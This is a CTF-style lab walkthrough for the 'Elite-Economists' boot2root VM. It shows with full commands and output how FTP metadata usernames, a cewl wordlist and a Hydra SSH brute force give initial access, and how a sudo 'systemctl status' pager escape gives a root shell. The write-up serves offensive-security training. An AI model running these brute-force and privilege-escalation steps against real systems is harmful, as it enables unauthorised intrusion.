Write-up Economists on HackMyVM
Elite-Economists is a vulnerable virtual machine developed by me. This machine is a so-called boot2root machine and is intended to guide aspiring hackers to their OSCP certification. The machine can be downloaded from www.hackmyvm.eu and is known as ‘Economists’. In this write-up I describe how you could hack this machine. If you want to learn something, try hacking this machine yourself first and if you really can’t figure it out, you can read this writeup to learn from it.
Getting started
First things first! Before starting hacking we should create a working directory for this machine.
1
2
3
4
5
6
7
8
┌──(emvee㉿kali)-[~]
└─$ cd Documents/HMV/
┌──(emvee㉿kali)-[~/Documents/HMV]
└─$ mkdir elite-economists
┌──(emvee㉿kali)-[~/Documents/HMV]
└─$ cd elite-economists
Now we should check our own IP address.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:0e:ca:e6 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
valid_lft 466sec preferred_lft 466sec
inet6 fe80::a00:27ff:fe0e:cae6/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:9c:5e:fc:1e brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
Enumeration
To identify other hosts a live in our network we can use fping.
1
2
3
4
5
6
7
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ fping -ag 10.0.2.0/24 2> /dev/null
10.0.2.1
10.0.2.2
10.0.2.3
10.0.2.12
10.0.2.15
Let’s add the IP address of our target to a variable.
1
2
3
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ ip=10.0.2.12
As first we have to know what we are attacking. We should run a port scan with Nmap to identify open ports and services on our target.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ sudo nmap -sC -sV -T4 -A -O -p- $ip
[sudo] password for emvee:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-14 09:48 CEST
Nmap scan report for 10.0.2.12
Host is up (0.00055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 1000 1000 173864 Sep 13 11:40 Brochure-1.pdf
| -rw-rw-r-- 1 1000 1000 183931 Sep 13 11:37 Brochure-2.pdf
| -rw-rw-r-- 1 1000 1000 465409 Sep 13 14:18 Financial-infographics-poster.pdf
| -rw-rw-r-- 1 1000 1000 269546 Sep 13 14:19 Gameboard-poster.pdf
| -rw-rw-r-- 1 1000 1000 126644 Sep 13 14:20 Growth-timeline.pdf
|_-rw-rw-r-- 1 1000 1000 1170323 Sep 13 10:13 Population-poster.pdf
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.0.2.15
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d9:fe:dc:77:b8:fc:e6:4c:cf:15:29:a7:e7:21:a2:62 (RSA)
| 256 be:66:01:fb:d5:85:68:c7:25:94:b9:00:f9:cd:41:01 (ECDSA)
|_ 256 18:b4:74:4f:f2:3c:b3:13:1a:24:13:46:5c:fa:40:72 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Home - Elite Economists
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:E0:55:E3 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 10.0.2.12
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.53 seconds
When nmap finished the scan we should carefully review the results and make some notes. The following items are added to my notes.
- Linux, probably Ubuntu
- Port 21
- FTP
- Anonymous access
- Files (5 PDF files)
- Port 22
- SSH
- OpenSSH 8.2p1 Ubuntu
- Port 80
- HTTP
- Apache 2.4.41
- Title: Home - Elite Economists
Based on these notes, we should consider starting enumeration on the FTP service and check if we could se the files.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ ftp $ip -a
Connected to 10.0.2.12.
220 (vsFTPd 3.0.3)
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||36502|)
150 Here comes the directory listing.
-rw-rw-r-- 1 1000 1000 173864 Sep 13 11:40 Brochure-1.pdf
-rw-rw-r-- 1 1000 1000 183931 Sep 13 11:37 Brochure-2.pdf
-rw-rw-r-- 1 1000 1000 465409 Sep 13 14:18 Financial-infographics-poster.pdf
-rw-rw-r-- 1 1000 1000 269546 Sep 13 14:19 Gameboard-poster.pdf
-rw-rw-r-- 1 1000 1000 126644 Sep 13 14:20 Growth-timeline.pdf
-rw-rw-r-- 1 1000 1000 1170323 Sep 13 10:13 Population-poster.pdf
226 Directory send OK.
ftp>
There are indeed five PDF files in the share. Let’s transfer them all in once to our working directory with wget.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ wget -m ftp://anonymous:anonymous@$ip
--2023-09-14 09:50:55-- ftp://anonymous:*password*@10.0.2.12/
=> ‘10.0.2.12/.listing’
Connecting to 10.0.2.12:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD not needed.
==> PASV ... done. ==> LIST ... done.
10.0.2.12/.listing [ <=> ] 588 --.-KB/s in 0s
2023-09-14 09:50:55 (153 MB/s) - ‘10.0.2.12/.listing’ saved [588]
--2023-09-14 09:50:55-- ftp://anonymous:*password*@10.0.2.12/Brochure-1.pdf
=> ‘10.0.2.12/Brochure-1.pdf’
==> CWD not required.
==> PASV ... done. ==> RETR Brochure-1.pdf ... done.
Length: 173864 (170K)
10.0.2.12/Brochure-1.pdf 100%[=============================================>] 169.79K --.-KB/s in 0.03s
2023-09-14 09:50:55 (6.47 MB/s) - ‘10.0.2.12/Brochure-1.pdf’ saved [173864]
--2023-09-14 09:50:55-- ftp://anonymous:*password*@10.0.2.12/Brochure-2.pdf
=> ‘10.0.2.12/Brochure-2.pdf’
==> CWD not required.
==> PASV ... done. ==> RETR Brochure-2.pdf ... done.
Length: 183931 (180K)
10.0.2.12/Brochure-2.pdf 100%[=============================================>] 179.62K --.-KB/s in 0.01s
2023-09-14 09:50:55 (11.7 MB/s) - ‘10.0.2.12/Brochure-2.pdf’ saved [183931]
--2023-09-14 09:50:55-- ftp://anonymous:*password*@10.0.2.12/Financial-infographics-poster.pdf
=> ‘10.0.2.12/Financial-infographics-poster.pdf’
==> CWD not required.
==> PASV ... done. ==> RETR Financial-infographics-poster.pdf ... done.
Length: 465409 (455K)
10.0.2.12/Financial-infograp 100%[=============================================>] 454.50K --.-KB/s in 0.02s
2023-09-14 09:50:55 (24.9 MB/s) - ‘10.0.2.12/Financial-infographics-poster.pdf’ saved [465409]
--2023-09-14 09:50:55-- ftp://anonymous:*password*@10.0.2.12/Gameboard-poster.pdf
=> ‘10.0.2.12/Gameboard-poster.pdf’
==> CWD not required.
==> PASV ... done. ==> RETR Gameboard-poster.pdf ... done.
Length: 269546 (263K)
10.0.2.12/Gameboard-poster.p 100%[=============================================>] 263.23K --.-KB/s in 0.01s
2023-09-14 09:50:55 (17.4 MB/s) - ‘10.0.2.12/Gameboard-poster.pdf’ saved [269546]
--2023-09-14 09:50:55-- ftp://anonymous:*password*@10.0.2.12/Growth-timeline.pdf
=> ‘10.0.2.12/Growth-timeline.pdf’
==> CWD not required.
==> PASV ... done. ==> RETR Growth-timeline.pdf ... done.
Length: 126644 (124K)
10.0.2.12/Growth-timeline.pd 100%[=============================================>] 123.68K --.-KB/s in 0.01s
2023-09-14 09:50:55 (8.06 MB/s) - ‘10.0.2.12/Growth-timeline.pdf’ saved [126644]
--2023-09-14 09:50:55-- ftp://anonymous:*password*@10.0.2.12/Population-poster.pdf
=> ‘10.0.2.12/Population-poster.pdf’
==> CWD not required.
==> PASV ... done. ==> RETR Population-poster.pdf ... done.
Length: 1170323 (1.1M)
10.0.2.12/Population-poster. 100%[=============================================>] 1.12M --.-KB/s in 0.01s
2023-09-14 09:50:55 (80.5 MB/s) - ‘10.0.2.12/Population-poster.pdf’ saved [1170323]
FINISHED --2023-09-14 09:50:55--
Total wall clock time: 0.1s
Downloaded: 7 files, 2.3M in 0.1s (22.3 MB/s)
As soon as the PDF files are in our working directory we should analyze them to gain some useful information. We can open the files with xdg-open and read the content of the files.
1
2
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ xdg-open 10.0.2.12/Brochure-1.pdf
In the PDFs only an email address and a website URL is mentioned.
- info@elite-econimists.hmv
- www.elite-econimists.hmv
There was not really any other useful information at this moment we could use. Let’s try to see who did make those files in the metadata.
1
2
3
4
5
6
7
8
9
10
11
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ cd $ip
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists/10.0.2.12]
└─$ exiftool *.pdf | grep Author
Author : joseph
Author : richard
Author : crystal
Author : catherine
Author : catherine
We have identified four usernames in the five files. Let’s add them to a users list.
1
2
3
4
5
6
7
8
9
10
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ nano users.txt
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ cat users.txt
joseph
richard
crystal
catherine
Since we cannot find any juicy information we should enumerate the website of Elite Economists. Let’s open it in Firefox.
1
2
3
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ firefox http://$ip &
[1] 33763
We should enumerate every detail, function and field in the website and make some notes about it.
There is an error message indicating that we should contact an employee to check the status of a service.
Since we did not find anything yet on the website we should consider creating a dictionary based on words of the website. We can utilize cewl to create a file.
1
2
3
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ cewl -d 2 -m 5 -w passwords.txt http://$ip
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
As soon as the dictionary is created we can try to run a brute force attack against the SSH service with Hydra.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ hydra ssh://$ip -L users.txt -P passwords.txt -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-14 09:56:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 1328 login tries (l:4/p:332), ~21 tries per task
[DATA] attacking ssh://10.0.2.12:22/
[22][ssh] host: 10.0.2.12 login: joseph password: wealthiest
[STATUS] 500.00 tries/min, 500 tries in 00:01h, 860 to do in 00:02h, 32 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
It looks like we have found a password for the user joseph
. We should add the username and password to our notes.
wealthiest
Initial access
With the credentials we have found we could try to logon to the SSH service as Joseph.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(emvee㉿kali)-[~/Documents/HMV/elite-economists]
└─$ ssh joseph@$ip
joseph@10.0.2.12's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 14 Sep 2023 07:58:34 AM UTC
System load: 0.02 Processes: 120
Usage of /: 46.9% of 11.21GB Users logged in: 0
Memory usage: 5% IPv4 address for enp0s3: 10.0.2.12
Swap usage: 0%
* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.
https://ubuntu.com/pro
Expanded Security Maintenance for Applications is not enabled.
51 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
New release '22.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
joseph@elite-economists:~$
It was successful to log in as Joseph. An Ubuntu 20.04.6 version is used and a new Ubuntu version is available. This is information we need to add to our notes.
First we have to check which user we are, which memberships this user has, which machine we are working on and whether there are multiple IP addresses and in which folder we are working. This is also useful if you are preparing for the OSCP exam.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
joseph@elite-economists:~$ whoami;id;hostname;ip a;pwd
joseph
uid=1001(joseph) gid=1001(joseph) groups=1001(joseph)
elite-economists
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:e0:55:e3 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.12/24 brd 10.0.2.255 scope global dynamic enp0s3
valid_lft 596sec preferred_lft 596sec
inet6 fe80::a00:27ff:fee0:55e3/64 scope link
valid_lft forever preferred_lft forever
/home/joseph
joseph@elite-economists:~$ ls -la
total 32
drwxr-xr-x 4 joseph joseph 4096 Sep 14 07:56 .
drwxr-xr-x 6 root root 4096 Sep 13 21:05 ..
-rw------- 1 joseph joseph 0 Sep 14 06:57 .bash_history
-rw-r--r-- 1 joseph joseph 220 Sep 13 21:03 .bash_logout
-rw-r--r-- 1 joseph joseph 3771 Sep 13 21:03 .bashrc
drwx------ 2 joseph joseph 4096 Sep 14 07:56 .cache
drwxrwxr-x 3 joseph joseph 4096 Sep 13 21:19 .local
-rw-r--r-- 1 joseph joseph 807 Sep 13 21:03 .profile
-rw-rw-r-- 1 joseph joseph 3271 Sep 14 06:55 user.txt
The use flag is in the home directory of this user. Let’s capture the first flag.
Let’s see if we can run any sudo command.
1
2
3
4
5
6
7
joseph@elite-economists:~$ sudo -l
Matching Defaults entries for joseph on elite-economists:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joseph may run the following commands on elite-economists:
(ALL) NOPASSWD: /usr/bin/systemctl status
It looks like we can run the command /usr/bin/systemctl status
as sudo
Privilege escalation
While running that command the program less
is shown to us. This could be exploited since the version of systemd
is before 247
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
joseph@elite-economists:~$ sudo /usr/bin/systemctl status
● elite-economists
State: running
Jobs: 0 queued
Failed: 0 units
Since: Thu 2023-09-14 07:33:52 UTC; 26min ago
CGroup: /
├─user.slice
│ └─user-1001.slice
│ ├─session-3.scope
│ │ ├─1555 sshd: joseph [priv]
│ │ ├─1653 sshd: joseph@pts/0
│ │ ├─1654 -bash
│ │ ├─1674 sudo /usr/bin/systemctl status
│ │ ├─1675 /usr/bin/systemctl status
│ │ └─1676 pager
│ └─user@1001.service …
│ └─init.scope
│ ├─1571 /lib/systemd/systemd --user
│ └─1572 (sd-pam)
├─init.scope
│ └─1 /sbin/init maybe-ubiquity
└─system.slice
├─apache2.service
│ ├─753 /usr/sbin/apache2 -k start
│ ├─755 /usr/sbin/apache2 -k start
│ └─756 /usr/sbin/apache2 -k start
├─systemd-networkd.service
│ └─637 /lib/systemd/systemd-networkd
├─systemd-udevd.service
│ └─394 /lib/systemd/systemd-udevd
├─cron.service
│ └─655 /usr/sbin/cron -f
├─polkit.service
│ └─676 /usr/lib/policykit-1/polkitd --no-debug
├─networkd-dispatcher.service
│ └─675 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
├─multipathd.service
│ └─554 /sbin/multipathd -d -s
├─accounts-daemon.service
│ └─651 /usr/lib/accountsservice/accounts-daemon
├─ModemManager.service
│ └─721 /usr/sbin/ModemManager
├─systemd-journald.service
│ └─358 /lib/systemd/systemd-journald
├─atd.service
│ └─692 /usr/sbin/atd -f
├─unattended-upgrades.service
│ └─707 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
├─ssh.service
│ └─728 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
├─snapd.service
│ └─681 /usr/lib/snapd/snapd
├─vsftpd.service
lines 1-53
To gain a root shell we should enter the following in less: !/bin/bash
1
!/bin/bash
A root shell is shown and we can own the whole machine. Let’s capture everything as we should do for the OSCP exam.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@elite-economists:/home/joseph# whoami;hostname;id;ip a
root
elite-economists
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:e0:55:e3 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.12/24 brd 10.0.2.255 scope global dynamic enp0s3
valid_lft 457sec preferred_lft 457sec
inet6 fe80::a00:27ff:fee0:55e3/64 scope link
valid_lft forever preferred_lft forever